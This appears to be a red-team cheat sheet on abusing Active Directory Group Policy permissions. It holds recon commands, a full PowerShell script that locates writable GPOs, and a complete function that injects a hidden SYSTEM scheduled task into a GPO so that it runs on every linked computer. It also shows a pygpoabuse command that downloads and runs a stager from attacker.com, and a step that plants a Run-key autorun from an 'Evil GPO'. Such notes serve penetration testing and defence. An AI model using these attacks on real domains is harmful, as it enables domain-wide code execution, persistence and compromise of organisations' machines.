# GPO Abuse

* <https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/>
* <https://wald0.com/?p=179>
* <https://github.com/EvotecIT/GPOZaurr>
* <https://xakep.ru/2023/02/01/exploiting-gpo/>
* <https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/>

Force a Group Policy refresh on all domain computers (needs the GroupPolicy RSAT module; it schedules a remote `gpupdate` task on every host, so it is noisy):

```
PS > Get-ADComputer -Filter * | % {Invoke-GPUpdate -Computer $_.name -Force -RandomDelayInMinutes 0}
```

## Hunt for GPOs

List all GPOs in the domain:

```
PS > .\SharpView.exe Get-DomainGPO -Properties displayName
```

List GPOs applied to a specific domain user or computer:

```
PS > .\SharpView.exe Get-DomainGPO -UserIdentity snovvcrash -Properties DisplayName
PS > .\SharpView.exe Get-DomainGPO -ComputerIdentity WS01 -Properties DisplayName
Or
Cmd > gpresult /r /user snovvcrash [/h gpos-snovvcrash.html]
Cmd > gpresult /r /s WS01 [/h gpos-ws01.html]
```

Search for GPOs that the `Domain Users` security group has write rights on (repeat the check for the `Authenticated Users` and `Everyone` SIDs, which such ACEs are frequently granted to):

```
PV3 > Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.SecurityIdentifier -eq ((Get-DomainGroup "Domain Users" | select objectSid).objectSid) -and $_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty"}
PV3 > Get-DomainGPO '{<GPO_GUID>}'
Or
PS > Get-GPO -Guid <GPO_GUID>
```

## Permissions Abuse

### Recon

Show all GPOs in the domain:

```
PV3 > Get-NetGPO -Domain megacorp.local | select cn,displayname
```

Search for GPOs that are controlled by the `MEGACORP\PolicyAdmins` group (PowerView 3 syntax; the older `Get-ObjectAcl -Name ... | ? {$_.IdentityReference -eq ...}` form from the harmj0y post is PowerView 2 and does not work with PV3):

```
PV3 > Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.SecurityIdentifier -eq ((Get-DomainGroup PolicyAdmins | select objectSid).objectSid) -and $_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty"}
```

List computers that are affected by a vulnerable (modifiable) GPO, i.e. computers that sit under an OU whose `gPLink` references the GPO GUID:

```
PV3 > Get-DomainOU -GPLink "00ff00ff-00ff-00ff-00ff-00ff00ff00ff" | % {Get-DomainComputer -SearchBase $_.distinguishedname}
```

Note: if I list all OUs affected by this GPO with PowerView, there will be no domain shown (like in BloodHound), but in Group Policy Management we can see that it is present. The reason is that `Get-DomainOU` only returns `organizationalUnit` objects, so a GPO linked at the domain root (the `domainDNS` object) or to a site never appears in that list; read the `gPLink` attribute of the domain object itself or check GPMC.

Check if the computer settings are enabled for this GPO and enable them if not (`Set-GpoStatus` is the helper from the gist below, not a GroupPolicy module cmdlet; the module only exposes `GpoStatus` as a property of the object returned by `Get-GPO`):

* <https://gist.github.com/snovvcrash/ecdc639b061fe787617d8d92d8549801>

```
PS > Get-Gpo VULN.GPO.NAME
PS > Set-GpoStatus VULN.GPO.NAME -Status AllSettingsEnabled
```

List users that can create a GPO and link it to a specific OU:

```
PV3 > Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=megacorp,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -match "CreateChild" } | select objectDN,securityIdentifier | fl
PV3 > Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select objectDN,securityIdentifier | fl
```
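The hunt and recon steps above depend on PowerView. The following is an added example (not code from the original page or from PowerView) that does the same two things with nothing but .NET/ADSI, so it works from any domain-joined host without tooling: it lists every GPO object on which the current security context (user SID plus all token group SIDs, nested groups included) holds write rights or ownership, and shows where each one is linked, including the domain root that `Get-DomainOU` misses. The function name `Find-WritableGPO` is illustrative; the query runs against the domain of the logged-on user.

```powershell
# Added example: find GPOs the current user can modify and where they are linked, via ADSI only.
# Assumes a domain-joined host and LDAP reachability to a DC; no PowerView/RSAT required.
function Find-WritableGPO {
    [CmdletBinding()]
    param()

    $ADRights = [System.DirectoryServices.ActiveDirectoryRights]
    # Any of these on the groupPolicyContainer lets you rewrite the policy or take control of the object.
    $writeMask = $ADRights::GenericAll -bor $ADRights::GenericWrite -bor $ADRights::WriteDacl -bor $ADRights::WriteOwner

    # Current user SID plus every group SID present in the logon token (nesting already expanded).
    $id     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    $rootDse  = [ADSI]"LDAP://RootDSE"
    $domainDn = [string]$rootDse.defaultNamingContext

    # 1. Map GPO DN -> OUs / domain root that link it, parsed from gPLink: [LDAP://<dn>;<opts>]...
    #    opts: 0 = enabled, 1 = link disabled, 2 = enforced, 3 = disabled + enforced.
    $links = @{}
    $ls = New-Object System.DirectoryServices.DirectorySearcher -ArgumentList ([ADSI]"LDAP://$domainDn")
    $ls.Filter   = "(&(|(objectClass=organizationalUnit)(objectClass=domainDNS))(gPLink=*))"
    $ls.PageSize = 500
    $null = $ls.PropertiesToLoad.AddRange([string[]]@("distinguishedName", "gPLink"))
    foreach ($r in $ls.FindAll()) {
        $gpLink = [string]$r.Properties["gplink"][0]
        foreach ($m in [regex]::Matches($gpLink, '\[LDAP://([^;\]]+);(\d+)\]')) {
            $gpoDn = $m.Groups[1].Value.ToLowerInvariant()
            $state = switch ([int]$m.Groups[2].Value) { 0 { "enabled" } 1 { "disabled" } 2 { "enforced" } 3 { "disabled, enforced" } }
            if (-not $links.ContainsKey($gpoDn)) { $links[$gpoDn] = New-Object System.Collections.ArrayList }
            $null = $links[$gpoDn].Add("$($r.Properties['distinguishedname'][0]) ($state)")
        }
    }

    # 2. Walk every GPO container and inspect owner + DACL.
    $gs = New-Object System.DirectoryServices.DirectorySearcher -ArgumentList ([ADSI]"LDAP://CN=Policies,CN=System,$domainDn")
    $gs.Filter   = "(objectClass=groupPolicyContainer)"
    $gs.PageSize = 500
    # Request owner + DACL only; asking for the SACL needs SeSecurityPrivilege and fails for plain users.
    $gs.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Owner -bor [System.DirectoryServices.SecurityMasks]::Dacl
    $null = $gs.PropertiesToLoad.AddRange([string[]]@("cn", "displayName", "distinguishedName", "gPCFileSysPath", "nTSecurityDescriptor"))

    foreach ($r in $gs.FindAll()) {
        $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $sd.SetSecurityDescriptorBinaryForm([byte[]]$r.Properties["ntsecuritydescriptor"][0])
        $dn   = [string]$r.Properties["distinguishedname"][0]
        $hits = New-Object System.Collections.ArrayList

        # The owner can always rewrite the DACL, so ownership counts as write.
        $owner = $sd.GetOwner([System.Security.Principal.SecurityIdentifier]).Value
        if ($mySids -contains $owner) { $null = $hits.Add("Owner") }

        foreach ($ace in $sd.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
            if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
            if ($mySids -notcontains $ace.IdentityReference.Value) { continue }
            $rights = $ace.ActiveDirectoryRights
            # WriteProperty only counts when unscoped (ObjectType empty = every attribute), not a single-attribute grant.
            $fullWriteProp = ([int]($rights -band $ADRights::WriteProperty) -ne 0) -and ($ace.ObjectType -eq [guid]::Empty)
            if (([int]($rights -band $writeMask) -ne 0) -or $fullWriteProp) {
                $null = $hits.Add("$($ace.IdentityReference.Value): $rights")
            }
        }
        if ($hits.Count -eq 0) { continue }

        $key = $dn.ToLowerInvariant()
        $linkedTo = if ($links.ContainsKey($key)) { $links[$key] -join "; " } else { "(not linked)" }
        [pscustomobject]@{
            DisplayName = [string]$r.Properties["displayname"][0]
            Guid        = [string]$r.Properties["cn"][0]
            SysVolPath  = [string]$r.Properties["gpcfilesyspath"][0]
            WriteVia    = $hits -join "; "
            LinkedTo    = $linkedTo
        }
    }
}

Find-WritableGPO | Format-List
```

Two caveats when reading the output: the AD object ACL is only half of the story, since the policy body lives under `SysVolPath` and GPMC keeps the folder ACL in sync with the object ACL, so confirm you can actually write there before picking a target; and site-level links live in the Configuration partition and are not covered by the domain-scoped `gPLink` search above.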

### Immediate Scheduled Tasks

#### GPOImmediateTask

* [PowerView3.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1#L5907-L6122) [(New-GPOImmediateTask)](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)

Create a task with a PowerShell payload (`-EncodedCommand` expects the Base64 of the UTF-16LE script, so encode with `echo -n` to avoid a trailing newline ending up in the command):

```
$ echo -n 'sc -path "c:\\windows\\temp\\poc.txt" -value "GPO Abuse PoC..."' | iconv -t UTF-16LE | base64 -w0; echo
cwBjACAALQBwAGEAdABoACAAIgBjADoAXABcAHcAaQBuAGQAbwB3AHMAXABcAHQAZQBtAHAAXABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIA
PS > New-GPOImmediateTask -TaskName Pentest -GPODisplayName VULN.GPO.NAME -CommandArguments '-NoP -NonI -W Hidden -Enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABcAHcAaQBuAGQAbwB3AHMAXABcAHQAZQBtAHAAXABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIA' -Force
```

Clean up:

```
PS > New-GPOImmediateTask -GPODisplayName VULN.GPO.NAME -Remove -Force
```

Check on a target host when Group Policy was last applied (the task only runs after the client has re-processed the modified GPO):

```
Cmd > GPRESULT /R
```
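`New-GPOImmediateTask` (and SharpGPOAbuse / pyGPOAbuse) work by editing three places at once: the GPP `ScheduledTasks.xml` under the GPO's SYSVOL folder, the `gPCMachineExtensionNames` attribute that tells clients which client-side extension to run, and the GPO version number, which must be bumped both in AD (`versionNumber`) and in `GPT.ini` or clients treat the policy as unchanged and never process it. The following added example (not code from the original page, PowerView or any of the tools above) performs those writes by hand so the mechanics are visible; it assumes write access to the GPO object and its SYSVOL folder from a domain-joined host. The function names `Add-GPOImmediateTask` and `Merge-GPOExtensionNames` and the task name are illustrative, and the GPO display name is the page's `VULN.GPO.NAME` placeholder.

```powershell
# Added example: inject an ImmediateTaskV2 entry into a GPO the hard way (SYSVOL XML + AD attributes).

function Merge-GPOExtensionNames {
    # gPCMachineExtensionNames looks like [{CSE}{tool}{tool}][{CSE}{tool}]..., entries sorted by GUID,
    # with the all-zero pseudo-CSE listing every tool GUID in use. Parse it, add ours, re-serialise sorted.
    param([string]$Existing, [string]$Cse, [string]$Tool)
    $map = @{}
    foreach ($m in [regex]::Matches($Existing, '\[([^\]]+)\]')) {
        $guids = @([regex]::Matches($m.Groups[1].Value, '\{[^}]+\}') | ForEach-Object { $_.Value.ToUpperInvariant() })
        if ($guids.Count -eq 0) { continue }
        $map[$guids[0]] = @($guids | Select-Object -Skip 1)
    }
    foreach ($key in @("{00000000-0000-0000-0000-000000000000}", $Cse)) {
        $map[$key] = @((@($map[$key]) + $Tool) | Where-Object { $_ } | Sort-Object -Unique)
    }
    ($map.Keys | Sort-Object | ForEach-Object { "[" + $_ + ($map[$_] -join "") + "]" }) -join ""
}

function Add-GPOImmediateTask {
    param(
        [Parameter(Mandatory)][string]$GPODisplayName,
        [Parameter(Mandatory)][string]$CommandArguments,
        [string]$Command  = "powershell.exe",
        [string]$TaskName = "Pentest"
    )
    $CseScheduledTasks  = "{AADCED64-746C-4633-A97C-D61349046527}"  # GPP Scheduled Tasks client-side extension
    $ToolScheduledTasks = "{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}"  # GPP Scheduled Tasks editor ("tool") GUID

    # 1. Resolve the groupPolicyContainer and its SYSVOL folder.
    $root = [ADSI]"LDAP://RootDSE"
    $s = New-Object System.DirectoryServices.DirectorySearcher -ArgumentList ([ADSI]"LDAP://CN=Policies,CN=System,$([string]$root.defaultNamingContext)")
    $s.Filter = "(&(objectClass=groupPolicyContainer)(displayName=$GPODisplayName))"
    $null = $s.PropertiesToLoad.AddRange([string[]]@("distinguishedName", "gPCFileSysPath", "versionNumber", "gPCMachineExtensionNames"))
    $r = $s.FindOne()
    if (-not $r) { throw "GPO '$GPODisplayName' not found" }
    $dn      = [string]$r.Properties["distinguishedname"][0]
    $sysvol  = [string]$r.Properties["gpcfilesyspath"][0]
    $version = [int]$r.Properties["versionnumber"][0]
    $ext     = if ($r.Properties["gpcmachineextensionnames"].Count) { [string]$r.Properties["gpcmachineextensionnames"][0] } else { "" }

    # 2. Add an ImmediateTaskV2 entry to Machine\Preferences\ScheduledTasks\ScheduledTasks.xml (create the file if needed).
    $dir  = Join-Path $sysvol "Machine\Preferences\ScheduledTasks"
    $file = Join-Path $dir "ScheduledTasks.xml"
    $x = { param($t) [System.Security.SecurityElement]::Escape($t) }   # XML-escape caller-supplied strings
    $task = @"
<ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="$(& $x $TaskName)" image="0" changed="$(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')" uid="{$([guid]::NewGuid().ToString().ToUpper())}" userContext="0" removePolicy="0">
  <Properties action="C" name="$(& $x $TaskName)" runAs="NT AUTHORITY\System" logonType="S4U">
    <Task version="1.3">
      <RegistrationInfo><Author>NT AUTHORITY\System</Author><Description></Description></RegistrationInfo>
      <Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal></Principals>
      <Settings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>false</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>true</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings>
      <Actions Context="Author"><Exec><Command>$(& $x $Command)</Command><Arguments>$(& $x $CommandArguments)</Arguments></Exec></Actions>
      <Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
    </Task>
  </Properties>
</ImmediateTaskV2>
"@
    if (Test-Path -LiteralPath $file) {
        [xml]$doc = Get-Content -LiteralPath $file -Raw          # keep whatever tasks the policy already has
    } else {
        $null = New-Item -ItemType Directory -Path $dir -Force
        [xml]$doc = '<?xml version="1.0" encoding="utf-8"?><ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}"></ScheduledTasks>'
    }
    $frag = $doc.CreateDocumentFragment()
    $frag.InnerXml = $task
    $null = $doc.DocumentElement.AppendChild($frag)
    $doc.Save($file)

    # 3. Register the CSE and bump the machine version (low 16 bits of versionNumber; the user half is the high 16)
    #    in AD *and* in GPT.ini. If the two disagree, or the number does not change, clients skip the GPO.
    $newExt     = Merge-GPOExtensionNames -Existing $ext -Cse $CseScheduledTasks -Tool $ToolScheduledTasks
    $newVersion = $version + 1
    $gpo = [ADSI]"LDAP://$dn"
    $gpo.Put("gPCMachineExtensionNames", $newExt)
    $gpo.Put("versionNumber", $newVersion)
    $gpo.SetInfo()
    $gptIni = Join-Path $sysvol "GPT.ini"
    $ini = if (Test-Path -LiteralPath $gptIni) { Get-Content -LiteralPath $gptIni -Raw } else { "[General]`r`n" }
    if ($ini -match '(?m)^Version=') { $ini = $ini -replace '(?m)^Version=\d+', "Version=$newVersion" }
    else { $ini += "Version=$newVersion`r`n" }
    Set-Content -LiteralPath $gptIni -Value $ini -NoNewline
    [pscustomobject]@{ GPO = $dn; TaskFile = $file; Version = $newVersion; ExtensionNames = $newExt }
}

Add-GPOImmediateTask -GPODisplayName "VULN.GPO.NAME" -CommandArguments '-NoP -NonI -W Hidden -c "Set-Content C:\Windows\Temp\poc.txt GPOAbusePoC"'
```

The task fires on each affected computer at its next policy refresh (or immediately after the `Invoke-GPUpdate` loop at the top of the page). Cleaning up is the same sequence in reverse: delete the `ImmediateTaskV2` node (or the whole file if you created it) and bump the version again; never decrement it, since a client that already saw the higher number would otherwise ignore the removal.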

#### GPOwned + pyGPOAbuse

* <https://github.com/X-C3LL/GPOwned>
* <https://github.com/Hackndo/pyGPOAbuse>

Get target GPO ID:

```
$ python3 GPOwned.py -u snovvcrash -p 'Passw0rd!' -d megacorp.local -dc-ip 192.168.1.11 -gpcmachine -listgpo
```

Create an immediate scheduled task (`-powershell` is a switch that wraps the command in an encoded PowerShell call and takes no value, so it must not sit between `-command` and its argument):

```
$ python3 pygpoabuse.py megacorp.local/snovvcrash:'Passw0rd!' -gpo-id <GPO_ID> -dc-ip 192.168.1.11 -v -powershell -command '(New-Object Net.WebClient).DownloadFile("https://attacker.com/stager.exe", "C:\Windows\Temp\stager.exe"); if ($?) {C:\Windows\Temp\stager.exe}'
```

### GPPrefRegistryValue

Check if the GroupPolicy module (GPMC) is installed and, if not, install it as a Windows feature (requires elevation; on a client OS add the "Group Policy Management Tools" RSAT capability instead):

```
PS > Get-Module -List -Name GroupPolicy | select -expand ExportedCommands
PS > Install-WindowsFeature -Name GPMC
```

Create an evil GPO and link it to the target OU (will be visible in the management console):

```
PS > New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=megacorp,DC=local"
```

Locate a writable network share:

```
PV3 > Find-DomainShare -CheckShareAccess
```

Prepare your payload, place it on a share the target computers can read (the one found above or one you control), and create an autorun value in the evil GPO so the payload runs at boot/logon; with `-Context Computer` the value lands in the machine-wide `Run` key and is executed in the context of whichever user logs on next:

```
PS > Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min /c \\srv01\SoftwareShare\evil.exe" -Type ExpandString
```

## WMI Filters

* <https://rastamouse.me/ous-and-gpos-and-wmi-filters-oh-my/>

## GPO Abuse via NTLM Relay

* <https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more>
* <https://github.com/synacktiv/GPOddity>

## Tools

* <https://github.com/FSecureLABS/SharpGPOAbuse>
* <https://github.com/cogiceo/GPOHound>

### GroupPolicyBackdoor

* <https://github.com/synacktiv/GroupPolicyBackdoor>

Install:

```
$ git clone https://github.com/synacktiv/GroupPolicyBackdoor && cd GroupPolicyBackdoor
$ python -m venv venv && source ./venv/bin/activate
$ pip install -r requirements.txt
```

Basic usage:

```
$ python gpb.py gpo enum -d megacorp.local --dc DC01.megacorp.local -k --gpo-name VulnGPO [--ldaps] [-v]
$ python gpb.py gpo inject -d megacorp.local --dc DC01.megacorp.local -k --module modules_templates/ImmediateTask_create.ini --gpo-name VulnGPO [--ldaps] [-v]
$ python gpb.py gpo clean -d megacorp.local --dc DC01.megacorp.local -k --state-folder state_folders/1970_01_01_000000 [--ldaps] [-v]
```
